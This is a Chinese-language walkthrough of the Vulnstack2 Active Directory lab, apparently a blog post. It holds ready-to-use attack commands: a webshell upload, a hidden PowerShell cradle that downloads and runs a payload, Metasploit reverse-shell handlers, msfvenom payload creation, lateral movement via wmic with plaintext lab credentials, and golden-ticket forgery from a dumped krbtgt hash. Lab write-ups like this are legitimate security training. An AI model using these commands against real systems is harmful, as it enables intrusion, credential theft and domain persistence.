攻防靶场|Vulnstack2靶场之CS实战

作者: 不染
免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。

0x00 简介

最近学点攻防,拿靶场练练手,大佬轻喷哈。

靶场简介:
红队实战系列,主要以真实企业环境为实例搭建一系列靶场,通过练习、视频教程、博客三位一体学习。本次红队环境主要Access Token利用、WMI利用、域漏洞利用SMB relay,EWS relay,PTT(PTC),MS14-068,GPP,SPN利用、黄金票据/白银票据/Sid History/MOF等攻防技术。

Bypass UAC
Windows系统NTLM获取(理论知识:Windows认证)
Access Token利用(MSSQL利用)
WMI利用
网页代理,二层代理,特殊协议代理(DNS,ICMP)
域内信息收集
域漏洞利用:SMB relay,EWS relay,PTT(PTC),MS14-068,GPP,SPN利用
域凭证收集
后门技术(黄金票据/白银票据/Sid History/MOF)
靶场由三台机器构成:WIN7、2008 server、2012 server
其中2008做为对外的web机,win7作为个人主机可上网,2012作为域控
攻防靶场|Vulnstack2靶场之CS实战
网络拓扑:
win10攻击机:192.168.111.128
kali攻击机:192.168.111.129
DC:10.10.10.10
PC:192.168.111.201
web:10.10.10.80 192.168.111.80
靶场踩坑注意:
靶机通用密码:1qaz@WSX
WEB主机初始的状态默认密码无法登录,切换用户 de1ay/1qaz@WSX ,然后修改WEB\de1ay的密码
注意需要手动开启服务,在 C:\Oracle\Middleware\user_projects\domains\base_domain\bin 下有一个 startWeblogic 的批处理,管理员身份运行它即可
管理员账号密码:Administrator/1qaz@WSX

0x01 外网渗透

1.1外网探测

先使用-sS参数进行端口探测

攻防靶场|Vulnstack2靶场之CS实战
结果整理如下:
445端口开放,存在smb服务,可能存在ms17-010/端口溢出漏洞
139端口开放,存在samba服务,可能存在爆破/未授权访问/远程命令执行漏洞
1433端口开放,存在mssql服务,可能存在爆破/注入/SA弱口令
3389端口开放,存在远程桌面
7001端口开放,存在weblogic

1.2 Weblogic漏洞利用

看一下Weblogic,这里先使用Java 反序列化终极测试工具测试漏洞

攻防靶场|Vulnstack2靶场之CS实战
这里上传冰蝎马,路径如下:

C:\Oracle\Middleware\user_projects\domains\base_domain\servers\AdminServer\tmp\_WL_internal\bea_wls_internal\9j4dqk\war\shell.jsp

攻防靶场|Vulnstack2靶场之CS实战

注意:对于反序列化漏洞,如果获得的是系统权限或者root权限,那就没必要上传木马,但如果只是web安装应用的权限,就上传获取更大权限。weblogic上传马的路径选择问题,可以参考相关文章,这里不再赘述。

使用冰蝎连接

http://192.168.111.80:7001/uddiexplorer/shell.jsp

密码为:rebeyond
攻防靶场|Vulnstack2靶场之CS实战
连接成功,权限为administrator
攻防靶场|Vulnstack2靶场之CS实战

1.3 CS派生MSF

kali上先开启CS服务端,端口号为54321
攻防靶场|Vulnstack2靶场之CS实战
在win10攻击机连接客户端
攻防靶场|Vulnstack2靶场之CS实战
新建监听器,name为web,其他默认。
攻防靶场|Vulnstack2靶场之CS实战
使用Cobalt strike生成一个木马放在WEB中
攻防靶场|Vulnstack2靶场之CS实战
复制powershell远程下载语句,语句如下:
攻防靶场|Vulnstack2靶场之CS实战

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.111.129:80/a'))"

然后在冰蝎shell中调用powershell远程加载执行恶意ps1
攻防靶场|Vulnstack2靶场之CS实战
这里可以看到,cs上线,权限为administrator
攻防靶场|Vulnstack2靶场之CS实战
新建监听器,配置如下:

name:msf
payload:foreign http
ip:192.168.111.129
port:1111

攻防靶场|Vulnstack2靶场之CS实战
在192.168.111.129的shell中执行spawn命令
攻防靶场|Vulnstack2靶场之CS实战
在 msf中开启监听模块,命令如下:

use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 192.168.111.129
set lport 1111
run

攻防靶场|Vulnstack2靶场之CS实战
这里可以看到,cs的会话已经派生到msf上

0x02内网渗透

2.1 ms14-058提权

先利用cs的Mimikatz插件获取凭据(需要Administrator权限)

攻防靶场|Vulnstack2靶场之CS实战
攻防靶场|Vulnstack2靶场之CS实战
利用ms14-058提权至system权限
攻防靶场|Vulnstack2靶场之CS实战
这里可以看到已提升为system权限
攻防靶场|Vulnstack2靶场之CS实战

2.2域信息收集

执行ipconfig /all命令,这里可以看到有双网卡。
攻防靶场|Vulnstack2靶场之CS实战
使用cs的端口扫描模块,扫描内网
攻防靶场|Vulnstack2靶场之CS实战
攻防靶场|Vulnstack2靶场之CS实战
攻防靶场|Vulnstack2靶场之CS实战
关闭防火墙
攻防靶场|Vulnstack2靶场之CS实战
防火墙成功关闭
攻防靶场|Vulnstack2靶场之CS实战
2.2.1查找域内用户

使用net user /domain 命令查看域内用户情况(需要system权限)
攻防靶场|Vulnstack2靶场之CS实战
2.2.2查找域管理员

使用net group “domain admins” /domain 命令查找域管理员
攻防靶场|Vulnstack2靶场之CS实战
2.2.3查找主域控

使用net group “domain controllers” /domain命令查看主域控
攻防靶场|Vulnstack2靶场之CS实战

2.3 DC上线

新建一个派生监听器
攻防靶场|Vulnstack2靶场之CS实战
在列表中选择psexec
攻防靶场|Vulnstack2靶场之CS实战
选择的user为de1ay的凭据
攻防靶场|Vulnstack2靶场之CS实战
选择smb会话
攻防靶场|Vulnstack2靶场之CS实战
DC成功上线
攻防靶场|Vulnstack2靶场之CS实战

2.4 msf中转路由

使用meterpreter生成payload.exe

msfvenom -p windows/meterpreter_reverse_tcp LHOST=10.10.10.80 LPORT=8888 -f exe >  payload.exe

攻防靶场|Vulnstack2靶场之CS实战
接着在cs中建立ipc连接,命令如下:

shell net use \\10.10.10.10\ipc$ 1qaz@WSX /user:de1ay

攻防靶场|Vulnstack2靶场之CS实战

shell copy C:\Users\de1ay.DE1AY\Desktop\payload.exe \\10.10.10.10\c$\windows\temp\payload.exe

攻防靶场|Vulnstack2靶场之CS实战
在cs的跳板机上利用wmic启动木马,命令如下:

shell wmic /node:10.10.10.10 /user:de1ay /password:1qaz@WSX process call create "C:\Windows\Temp\payload.exe"

攻防靶场|Vulnstack2靶场之CS实战
接着使用meterpreter进行监听,命令如下:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 10.10.10.80
set lport 8888
run

攻防靶场|Vulnstack2靶场之CS实战
DC成功上线
攻防靶场|Vulnstack2靶场之CS实战

0x03 域内权限维持

3.1域控信息收集

在域控上读取krbtgt账户的ntlm密码哈希和SID
攻防靶场|Vulnstack2靶场之CS实战

  • Krbtgt:82dfc71b72a11ef37d663047bc2088fb
  • SID:S-1-5-21-2756371121-2868759905-3853650604-1001
    接着用来伪造黄金票据。
    攻防靶场|Vulnstack2靶场之CS实战

3.2伪造黄金票据

黄金票据是伪造票据授予票据(TGT),也被称为认证票据。如下图所示,与域控制器没有AS-REQ或AS-REP(步骤1和2)通信。由于黄金票据是伪造的TGT,它作为TGS-REQ的一部分被发送到域控制器以获得服务票据。
攻防靶场|Vulnstack2靶场之CS实战
Kerberos黄金票据是有效的TGT Kerberos票据,因为它是由域Kerberos帐户(KRBTGT)加密和签名的 。TGT仅用于向域控制器上的KDC服务证明用户已被其他域控制器认证。TGT被KRBTGT密码散列加密并且可以被域中的任何KDC服务解密的。

黄金票据的条件要求:
1.域名称

2.域的sid 值

3.域的krbtgt账户ntlm密码哈希

4.伪造用户名
一旦攻击者拥有管理员访问域控制器的权限,就可以使用Mimikatz来提取KRBTGT帐户密码哈希值。

攻防靶场|Vulnstack2靶场之CS实战
利用已经获得的krbtgt账户ntlm密码哈希和sid值制作黄金票据
攻防靶场|Vulnstack2靶场之CS实战
伪造成功攻防靶场|Vulnstack2靶场之CS实战

0x04 总结

靶场比较经典,姿势较为简单,以后还会看情况更新其他靶场。

0x05 了解更多安全知识

欢迎关注我们的安全公众号,学习更多安全知识!!!
欢迎关注我们的安全公众号,学习更多安全知识!!!
欢迎关注我们的安全公众号,学习更多安全知识!!!
攻防靶场|Vulnstack2靶场之CS实战

上一篇:Win2008R2PHP5.4环境加载Zend模块


下一篇:Freemarker实例教程